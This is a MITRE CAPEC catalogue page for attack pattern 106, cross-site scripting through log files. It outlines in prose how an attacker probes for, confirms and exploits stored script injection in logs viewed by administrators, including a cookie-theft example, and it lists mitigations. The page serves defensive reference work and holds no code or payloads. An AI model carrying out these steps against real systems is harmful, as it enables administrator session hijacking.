Home > CAPEC List > CAPEC-106: Cross Site Scripting through Log Files (Version 2.4)  

CAPEC-106: Cross Site Scripting through Log Files

 
Cross Site Scripting through Log Files
Definition in a New Window Definition in a New Window
Attack Pattern ID: 106
Abstraction: Standard
Status: Draft
Completeness: Complete
+ Description

Summary

An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attackers' scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.

Attack Execution Flow

Explore
  1. Probe for log injection vulnerability:

    The attacker probes all user-controllable data inputs to the system to probe for log injection vulnerabilities. This may be difficult (unless the attacker has a white box view of the system) because there may not be a feedback event to indicate to the attacker that certain information is being logged.

    Outcomes

    IDTypeOutcome Description
    1Success
    User injected input shows up in the logs

    Security Controls

    IDTypeSecurity Control Description
    1Preventative
    Apply appropriate input validation and filtering of user-controllable input before writing to logs
  2. Probe for cross-site scripting vulnerability:

    The attacker probes all user-controllable data inputs to the system to probe for any cross-site scripting vulnerabilities. Cross-site scripting vulnerabilities identified anywhere in the application indicate an increased potential that such vulnerabilities may exist in the log management portions of the application.

    Outcomes

    IDTypeOutcome Description
    1Success
    Attacker-injected script is executed in user's browser.

    Security Controls

    IDTypeSecurity Control Description
    1Preventative
    HTML encode all log contents before displaying in log management interfaces.
Experiment
  1. Confirm exploitability:

    Create a simple script and inject it into one of the potentially vulnerable fields. This script should take some action which will give an attacker an indication that the attack vector exists.

    Attack Step Techniques

    IDAttack Step Technique DescriptionEnvironments
    1

    The idea is to receive some sort of a feedback event that confirms that an attack is succeeding. That is done with a simple script prior to crafting possibly a more complex script to launch an actual attack.

    env-Web

    Outcomes

    IDTypeOutcome Description
    1Success
    Expected script execution feedback event is observed.
Exploit
  1. Inject System Logs with Malicious Scripts:

    Create a malicious script to run in the administrator's web based interface and inject it in the system's logs through one of the user controlled fields that are being logged.

    Attack Step Techniques

    IDAttack Step Technique DescriptionEnvironments
    1

    Inject the vulnerable fields by tampering with their values to contain the malicious scripts. Possibly trigger another event that makes it more likely that injected logs are viewed in the vulnerable UI as soon as possible.

    env-Web
+ Attack Prerequisites
  • The system uses a web based interface

  • The system does not cleanse / validate user supplied data before writing it to logs

  • Information from logs is displayed in a web based interface

  • The web based log interface does not HTML output encode the log data prior to displaying it in the administrator console.

+ Typical Severity

High

+ Typical Likelihood of Exploit

Likelihood: Medium

+ Methods of Attack
  • Injection
+ Examples-Instances

Description

An attacker determines that a particular system uses a web based interface for administration. The attacker creates a new user record and supplies a malicious script in the user name field. The script will steal the administrator's authentication cookie and forward it to a site controlled by the attacker. The user name field is not validated by the system and is logged as is in the log. At some point later, an administrator reviews the log activity in the administrative console. When the administrator comes across the attackers' activity record, the malicious script is executed in the context of the attackers' browser, stealing the administrator's authentication cookie and forwarding it to the attacker. An attacker then uses the received authentication cookie to log in to the system as an administrator, assuming that the administrator console can be accessed remotely.

+ Attacker Skills or Knowledge Required

Skill or Knowledge Level: Low

Requires to ability to write a simple script and try to inject it through various user controlled fields in the system.

+ Resources Required

No specialized hardware is required

+ Probing Techniques

Description

Locate system screens for operations that are likely to be logged and use these as starting points for injection

+ Solutions and Mitigations

Cleanse all user supplied data before placing it in the logs. Reject all bad data. Ensure that the data is in the expected form.

Use proper HTML output encoding techniques to strip the log data of potentially dangerous scripting characters before displaying it in the administrative console

If possible, disable script execution in the administrative interface.

+ Attack Motivation-Consequences
ScopeTechnical ImpactNote
Confidentiality
Read application data
Read files or directories
Confidentiality
Authorization
Access_Control
Gain privileges / assume identity
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Integrity
Modify memory
Modify files or directories
Modify application data
+ Relevant Security Requirements

HTML output encode all data prior to writing to an HTML page

Properly validate and cleanse/reject user supplied data before writing it to log files

+ Purposes
  • Exploitation
+ CIA Impact
Confidentiality Impact: HighIntegrity Impact: HighAvailability Impact: Medium
+ Technical Context
Architectural Paradigms
Client-Server
n-Tier
SOA
Frameworks
All
Platforms
All
Languages
All
+ Content History
Submissions
SubmitterOrganizationDateComments
Evgeny LebanidzeCigital, Inc2009-01-12Initial core pattern content
Modifications
ModifierOrganizationDateCommentsSource
Sean BarnumCigital Federal, Inc.2009-04-20Refinement of pattern content
CAPEC Content TeamThe MITRE Corporation2014-02-06Updated Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-InstancesInternal

Page Last Updated: April 10, 2014